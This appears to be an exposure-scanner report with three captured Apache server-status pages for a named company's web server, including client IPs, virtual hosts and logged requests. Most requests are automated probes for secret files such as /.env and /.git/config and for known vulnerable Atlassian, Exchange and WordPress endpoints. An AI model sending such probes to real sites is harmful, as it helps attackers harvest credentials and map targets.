/?rest_route=/wp/v2/users/ HTTP/1.1 0-26524082860/6/30008_ 0.0500122136730.00.01984.28 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-26524082860/5/30318_ 0.0500134298020.00.01988.07 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 0-26524082860/3/30180_ 0.0500159870220.00.001075.62 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-26524082850/0/34631_ 0.0070140520710.00.001042.89 13.229.103.43http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/faZ5m7Mzc6whAa1uyN_aeiFKOLjdiHu 1-26524082850/1/35175_ 0.0020170149950.00.001119.32 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 1-26524082850/0/34868_ 0.0070164105360.00.001057.04 172.68.135.201h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/0/34705_ 0.002336152122520.00.001024.48 172.71.254.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/0/35510_ 0.0000144942980.00.001113.69 198.41.227.125h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/1/36132_ 0.0010152173530.00.001046.54 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-26524082850/1/35212_ 0.0001178228520.00.001065.68 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-26524082850/1/35896_ 0.0000141605630.00.001007.10 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 1-26524082850/1/34115_ 0.0000141371700.00.00927.07 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-26524082850/1/35388_ 0.0000133219010.00.00982.22 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-26524082840/1/29318_ 0.0011147031890.00.01807.22 103.4.251.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-26524082840/2/28546_ 0.0000138156450.00.01830.09 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 2-26524082840/1/29425_ 0.0010207910700.00.00893.14 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 2-26524082840/1/28577_ 0.0000137873550.00.00814.26 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-26524082840/1/28956_ 0.0010107018590.00.001055.76 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-26524082840/1/29110_ 0.0000119748330.00.00848.32 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 2-26524082840/0/29017_ 0.0020117195400.00.00851.95 103.4.251.93http/1.1 2-26524082840/0/28901_ 0.0020133837050.00.00858.89 172.71.172.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/0/29242_ 0.0020118067390.00.00925.10 3.133.7.129http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/-dQY3N_Xg2V-m--0ZdbXfvlqAuIf8DV 2-26524082840/1/29009_ 0.0020152816150.00.00889.91 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 3-26524084170/9/33979_ 0.0600198383970.00.041085.70 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-26524084170/5/32840_ 0.0600164394340.00.00984.21 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 3-26524084170/5/33707_ 0.0600165324560.00.011110.14 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-26524084170/7/33137_ 0.0600217237200.00.011108.01 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-26524084170/5/33096_ 0.0500139575630.00.001026.92 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/5/33131_ 0.0600145452950.00.011049.89 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-26524084170/2/33401_ 0.0601118936590.00.011158.26 104.164.126.170http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-26524084170/5/33460_ 0.0600244492960.00.011094.59 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 3-26524084170/5/32838_ 0.0600165633080.00.001031.79 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-26524084170/10/33973_ 0.0600172144400.00.011093.45 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-26524082870/2/30245_ 0.0100280326520.00.00955.14 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-26524082870/1/30455_ 0.0000127857270.00.001038.50 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-26524082870/1/30524_ 0.0100128805280.00.001052.62 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-26524082870/2/30796_ 0.0000141197680.00.00923.70 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-26524082870/0/30266_ 0.00031145322870.00.00965.53 162.158.120.137h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc832fbd234
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 09-May-2024 01:44:54 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 946 Parent Server MPM Generation: 945 Server uptime: 98 days 14 hours 1 minute 55 seconds Server load: 1.23 1.85 1.76 Total accesses: 2769700 - Total Traffic: 68.1 GB - Total Duration: 1591803228 CPU Usage: u256.12 s359.97 cu14351.3 cs9980.29 - .293% CPU load .325 requests/sec - 8.4 kB/second - 25.8 kB/request - 574.72 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03485698no7yes010006 13485695no2yes010001 23485697no1yes010000 33485696no3yes010002 43485856no4yes19000 Sum5017 149009 ______________________________________________W___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-94534856980/3/52384_ 0.0400250717100.00.131205.74 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-94534856980/3/52902_ 0.0400281865630.00.001205.44 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-94534856980/2/52417_ 0.0400329813420.00.001288.02 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-94534856980/2/52767_ 0.0300296242560.00.011226.43 46.101.111.185http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-94534856980/1/51351_ 0.0400244919720.00.001208.86 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-94534856980/1/51522_ 0.0300251629060.00.001287.67 46.101.111.185http/1.1 0-94534856980/1/51579_ 0.0400225554950.00.001177.93 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 0-94534856980/1/51860_ 0.03048378316980.00.011151.00 143.198.200.254http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-94534856980/1/52448_ 0.0300269073790.00.001148.76 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-94534856980/1/53637_ 0.0400240214870.00.002617.07 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-94534856950/4/57876_ 0.1000261184080.00.011379.48 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-94534856950/4/58065_ 0.0900356708620.00.021261.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-94534856950/3/57529_ 0.0900330678880.00.011216.37 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-94534856950/3/57481_ 0.0900278372490.00.011385.98 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-94534856950/4/57697_ 0.0900590459600.00.011310.29 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-94534856950/6/55791_ 0.1000414568860.00.021401.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-94534856950/3/56904_ 0.1000326298980.00.011346.72 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-94534856950/3/57250_ 0.1000350133210.00.011173.39 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-94534856950/3/59053_ 0.1000329901740.00.011448.89 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-94534856950/1/57667_ 0.0900307886770.00.001273.53 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-94534856970/3/54384_ 0.0400285664750.00.011228.94 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-94534856970/3/56256_ 0.0400295855350.00.001288.48 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 2-94534856970/2/56464_ 0.0400285113690.00.011199.47 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-94534856970/2/55455_ 0.0400402900580.00.002658.66 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-94534856970/1/55027_ 0.0400276715130.00.001407.55 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-94534856970/0/54862_ 0.00052362836910.00.001227.06 143.198.200.254http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-94534856970/1/55252_ 0.0400281054760.00.002651.92 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-94534856970/2/55082_ 0.0400267789080.00.521287.55 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-94534856970/2/55480_ 0.0400299126620.00.011252.46 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-94534856970/2/54697_ 0.0400346329260.00.001216.38 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-94534856960/2/55846_ 0.0400318038230.00.011318.19 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-94534856960/0/55120_ 0.000405255713670.00.001330.97 143.198.200.254http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-94534856960/2/56803_ 0.02058372594640.00.011288.86 143.198.200.254http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-94534856960/3/56559_ 0.0401431880150.00.011360.62 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-94534856960/2/56127_ 0.0400327962040.00.031156.98 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-94534856960/1/56304_ 0.0400299392480.00.001318.92 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-94534856960/1/55811_ 0.010944306273690.00.001434.60 172.68.139.50h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-94534856960/0/55986_ 0.0000351804950.00.001185.16 46.101.111.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-94534856960/2/54773_ 0.0400376568090.00.001215.54 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-94534856960/1/56890_ 0.0400283770630.00.001314.15 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-94534858560/5/56647_ 0.20046358403530.00.021452.12 46.101.111.185http/1.1 4-94534858560/7/56685_ 0.2000288566950.00.072803.85 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-94534858560/6/54907_ 0.20044270420040.00.021269.72 143.198.200.254http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-94534858560/6/55580_ 0.2100380122180.00.021145.38 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-94534858560/2/55861_ 0.2100349483300.00.001385.46 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-94534858560/3/54269_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc85fe19194
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 08-May-2024 19:35:52 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 939 Parent Server MPM Generation: 938 Server uptime: 98 days 7 hours 52 minutes 53 seconds Server load: 1.27 1.16 1.10 Total accesses: 2763221 - Total Traffic: 67.9 GB - Total Duration: 1589146769 CPU Usage: u257.02 s360.13 cu14315.5 cs9960.04 - .293% CPU load .325 requests/sec - 8.4 kB/second - 25.8 kB/request - 575.107 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03476465no1yes010000 13476462no1yes010000 23476466no0yes010000 33476595no1yes19000 43476463no0yes010000 Sum503 149000 ___________________________________W______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-93834764650/0/52240_ 0.00748173250287420.00.001203.38 194.224.90.153h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93834764650/2/52755_ 0.22406439281424150.00.031203.53 104.156.155.32http/1.1 0-93834764650/2/52281_ 0.4321329397430.00.011287.03 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-93834764650/1/52639_ 0.074060295840990.00.001225.36 104.156.155.32http/1.1 0-93834764650/1/51213_ 0.2523331244459370.00.001207.86 104.156.155.32http/1.1 0-93834764650/0/51383_ 0.004050251201630.00.001286.63 104.156.155.32http/1.1 0-93834764650/1/51453_ 0.242334225200990.00.001177.29 104.156.155.32http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93834764650/1/51726_ 0.41280377838650.00.171148.54 172.69.67.29h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93834764650/0/52312_ 0.00405283268673280.00.001147.61 104.156.155.32http/1.1 0-93834764650/1/53500_ 0.2620239745860.00.002615.47 172.70.210.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-93834764620/0/57841_ 0.00407409261102270.00.001379.05 104.156.155.32http/1.1 1-93834764620/0/58031_ 0.004070356668160.00.001261.45 104.156.155.32http/1.1 1-93834764620/4/57496_ 0.423376330584550.00.701215.84 194.224.90.153h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-93834764620/0/57454_ 0.004051278286920.00.001385.81 104.156.155.32http/1.1 1-93834764620/1/57670_ 0.11280590352900.00.011309.62 172.70.57.197h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-93834764620/0/55757_ 0.004060414455420.00.001400.28 104.156.155.32http/1.1 1-93834764620/0/56871_ 0.00280326255850.00.001346.39 172.70.39.87h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-93834764620/2/57222_ 0.27406344350062000.00.251173.13 104.156.155.32http/1.1 1-93834764620/1/59020_ 0.254080329821840.00.001448.15 104.156.155.32http/1.1 1-93834764620/0/57633_ 0.00407690307775960.00.001273.15 104.156.155.32http/1.1 2-93834764660/4/54039_ 0.49421218283952170.00.041218.66 172.70.162.143h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93834764660/3/55909_ 0.5000294436760.00.031280.60 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-93834764660/0/56110_ 0.001021434283299980.00.001189.43 93.158.91.25http/1.1 2-93834764660/0/55083_ 0.00046401154290.00.002649.83 104.156.155.32http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93834764660/0/54690_ 0.0018735275213730.00.001399.58 104.156.155.32http/1.1 2-93834764660/3/54514_ 0.46107531361119470.00.321219.59 172.68.134.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93834764660/2/54903_ 0.4437308279448000.00.032621.43 172.71.150.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93834764660/0/54736_ 0.0037442266204900.00.001278.05 104.156.155.32http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93834764660/1/55124_ 0.391020297464190.00.001244.53 93.158.91.25http/1.1relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93834764660/1/54350_ 0.5010344712020.00.001209.75 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-93834765950/17/55747_ 1.352350317667310.00.321316.05 157.245.113.227http/1.1 3-93834765950/25/55017_ 1.4421255102170.00.581328.86 157.245.113.227http/1.1 3-93834765950/17/56706_ 1.4610372066760.00.161287.03 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-93834765950/20/56467_ 1.4610431423910.00.821359.32 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-93834765950/32/56030_ 1.413958327492560.00.821155.85 157.245.113.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-93834765950/20/56209W 1.4100298890900.00.601316.76 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-93834765950/22/55720_ 1.422598305812010.00.501432.06 157.245.113.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-93834765950/20/55902_ 1.4600351459820.00.291184.01 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-93834765950/19/54668_ 1.360917375964190.00.511213.47 157.245.113.227http/1.1 3-93834765950/22/56791_ 1.4610283458100.00.191312.90 157.245.113.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-93834764630/1/56618_ 0.114040358386870.00.011451.78 104.156.155.32http/1.1 4-93834764630/0/56656_ 0.004060288497510.00.002803.54 104.156.155.32http/1.1 4-93834764630/1/54867_ 0.3433329270372690.00.001269.18 194.224.90.153h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-93834764630/0/55545_ 0.004060380101590.00.001144.91 104.156.155.32http/1.1 4-93834764630/0/55835_ 0.003280349464320.00.001385.15 104.156.155.32http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-93834764630/1/54240_ 0.1511990303553090.00.141308.68 172.70.57.176h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-93834764630/0/56701_ 0.004070287266680.00.001234.40 104.156.155.32http/1.1 4-93834764630/0/55034_ 0.00119425256165050.00.001418.86 85.62.79.37h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-93834764630/1/57764_ 0.1340329740190.00.131324.19 157.245.113.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-938
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc87f570e14
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 01-May-2024 01:27:37 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 856 Parent Server MPM Generation: 855 Server uptime: 90 days 13 hours 44 minutes 39 seconds Server load: 1.21 1.10 1.09 Total accesses: 2549831 - Total Traffic: 63.0 GB - Total Duration: 1488902016 CPU Usage: u284.45 s357.43 cu13283.9 cs9377.95 - .298% CPU load .326 requests/sec - 8.4 kB/second - 25.9 kB/request - 583.922 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03215719no0yes010000 13215587no0yes010000 23215590no1yes19000 33215588no0yes010000 43215589no0yes010000 Sum501 149000 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-85532157190/403/48967_ 25.56200310237451880.07.651130.51 172.70.55.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/395/49853_ 25.761980270744700.08.671124.62 172.69.234.150h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-85532157190/335/49220_ 25.741950318220940.08.121233.97 172.70.210.128h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/452/49466_ 25.641991285033970.020.161121.72 172.71.254.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/334/47799_ 25.321990233198520.018.461115.54 162.158.175.59h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/315/48002_ 25.781980240414210.020.401204.02 172.69.234.158h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-85532157190/317/48619_ 25.761990214389180.09.821080.09 172.69.234.166h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/326/48577_ 25.781950365590510.07.411083.70 172.69.234.169h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-85532157190/317/49039_ 25.781980251897160.06.551076.19 172.69.234.146h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-85532157190/470/50418_ 25.761990229486110.019.382525.30 172.69.234.169h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-85532155870/63/55163_ 10.031991253890770.013.661299.06 172.69.234.146h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-85532155870/64/55501_ 10.042041349447220.01.051209.95 172.69.234.167h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-85532155870/60/54698_ 10.041990324155900.01.851150.18 172.69.234.174h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-85532155870/52/55095_ 10.042040271778490.04.441337.62 172.69.234.159h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-85532155870/59/55007_ 9.2020097583565090.01.041228.90 2.136.78.3h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-85532155870/64/53429_ 9.662000407291960.05.131343.13 172.69.67.47h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-85532155870/65/54032_ 10.041990289728020.01.381287.38 172.69.234.167h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-85532155870/59/54635_ 9.93200245337638330.01.411115.45 172.70.130.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-85532155870/67/56546_ 10.041991322935950.01.351363.96 172.69.234.174h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-85532155870/64/54975_ 8.98200288298452370.01.141190.69 172.69.59.54h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/319/49575_ 20.0100262359200.08.241111.45 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-85532155900/246/51488_ 19.8800270472720.06.781182.21 142.93.129.190h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-85532155900/276/51855_ 19.96055260915630.05.841087.46 142.93.129.190http/1.1 2-85532155900/213/50337_ 20.0110352001290.011.212557.34 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-85532155900/244/50251_ 20.0110240478270.06.641296.14 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-85532155900/353/50265W 20.0000338250220.07.141096.15 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-85532155900/256/49941_ 20.0100255667410.05.652517.57 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-85532155900/235/50369_ 20.0110242751180.05.301177.84 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-85532155900/238/50658_ 19.9421399267831570.06.471114.33 142.93.129.190h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-85532155900/230/49936_ 20.0110315438390.05.631122.42 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-85532155880/57/49233_ 10.662000264868840.02.101212.88 172.71.31.154h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/60/49044_ 10.791990236297500.01.521225.85 172.69.234.180h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/164/50620_ 10.662000349812820.01.851175.99 108.162.237.101h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-85532155880/115/50394_ 10.382000412056560.01.801208.14 172.64.236.49h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/62/49508_ 10.811980302482300.03.141059.56 172.69.234.180h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-85532155880/58/50115_ 10.801990279633220.00.681237.73 172.69.234.174h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/73/49261_ 10.811980281277260.04.611258.78 172.69.234.160h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-85532155880/65/49101_ 10.801991330289690.01.131076.26 